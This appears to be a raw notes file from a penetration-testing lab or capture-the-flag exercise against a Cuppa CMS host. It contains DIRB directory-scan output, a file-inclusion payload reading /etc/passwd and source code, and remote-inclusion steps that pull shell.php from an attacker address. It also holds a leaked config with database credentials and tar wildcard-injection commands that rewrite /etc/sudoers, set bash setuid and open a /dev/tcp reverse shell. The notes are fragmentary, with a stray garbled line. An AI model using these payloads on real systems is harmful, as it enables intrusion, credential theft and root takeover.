
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

OUTPUT_FILE: dirbt
START_TIME: Wed Oct  4 16:16:19 2023
URL_BASE: http://10.10.99.79/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.99.79/ ----
==> DIRECTORY: http://10.10.99.79/admin/
==> DIRECTORY: http://10.10.99.79/config/
==> DIRECTORY: http://10.10.99.79/css/
+ http://10.10.99.79/index.html (CODE:200|SIZE:523)
==> DIRECTORY: http://10.10.99.79/js/
+ http://10.10.99.79/server-status (CODE:403|SIZE:276)
==> DIRECTORY: http://10.10.99.79/squirrelmail/

---- Entering directory: http://10.10.99.79/admin/ ----

---- Entering directory: http://10.10.99.79/config/ ----

---- Entering directory: http://10.10.99.79/css/ ----

---- Entering directory: http://10.10.99.79/js/ ----

---- Entering directory: http://10.10.99.79/squirrelmail/ ----
+ http://10.10.99.79/squirrelmail/class (CODE:403|SIZE:276)
==> DIRECTORY: http://10.10.99.79/squirrelmail/config/


 DIRECTORY: http://10.10.116.196/45kra24zxs28v3yd/administrator/


http://10.10.116.196/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

)s{A&2Z=F^n_E.B`
http://10.10.116.196/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

http://10.10.116.196/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php


1. Python server
2. upload file
http://10.10.116.196/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.9.1.255/shell.php?
3. start listener
4. executefile
http://10.10.116.196/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.9.1.255:4445/shell.php

http://target/cuppa/alerts/alertConfigField.php?urlConfig

<?php 
	class Configuration{
		public $host = "localhost";
		public $db = "cuppa";
		public $user = "root";
		public $password = "password123";
		public $table_prefix = "cu_";
		public $administrator_template = "default";
		public $list_limit = 25;
		public $token = "OBqIPqlFWf3X";
		public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
		public $upload_default_path = "media/uploadsFiles";
		public $maximum_file_size = "5242880";
		public $secure_login = 0;
		public $secure_login_value = "";
		public $secure_login_redirect = "";
	} 



echo "" > '--checkpoint=1'
echo "" > '--checkpoint-action=exec=sh sudo.sh'
echo '#/!bin/bash\nchmod +s /bin/bash' > sudo.sh
echo 'www-data ALL=(root) NOPASSWD: ALL' > /etc/sudoers

printf '#!/bin/bash\nbash -i >& /dev/tcp/10.9.1.255/4443 0>&1' > cacete

 touch --checkpoint=1
echo "" '--checkpoint-action=exec=bash\ cacete'

rm -f '\-\-checkpoint-action=exec=exec=sh\ sudo.sh'